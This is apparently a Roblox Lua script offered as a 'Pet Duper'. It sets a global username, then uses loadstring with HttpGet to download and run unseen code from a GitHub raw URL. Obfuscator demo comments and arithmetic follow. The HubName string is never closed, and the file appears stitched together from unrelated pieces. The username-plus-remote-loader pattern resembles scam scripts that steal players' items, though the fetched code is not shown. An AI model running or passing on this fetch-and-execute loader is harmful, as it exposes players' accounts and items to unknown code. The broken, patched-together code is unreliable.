_G.Username = "ongchuakia123"
_G.HubName = "Pet Duper:
loadstring(game:HttpGet("https://raw.githubusercontent.com/Jayiioceanii/PeakOnTop/main/peak.lua"))()
local a = ((16164 + (((3864 + 364101) - 274396) - 67600)) + (190952 - 110638))
a = a + ((113 - (26 + 67)) + (1219 - (119 + 997))) -- Example obfuscation

-- To hide your precious values, try obfuscating them!
-- Click the [Literals] button in the upper-right corner
local b = 1203456
local c = 1230471
local d = 8023481

-- The below if-statement is opque and can be predicted as
-- all conditions are staticly defined
if c > b then
    print("true")
end
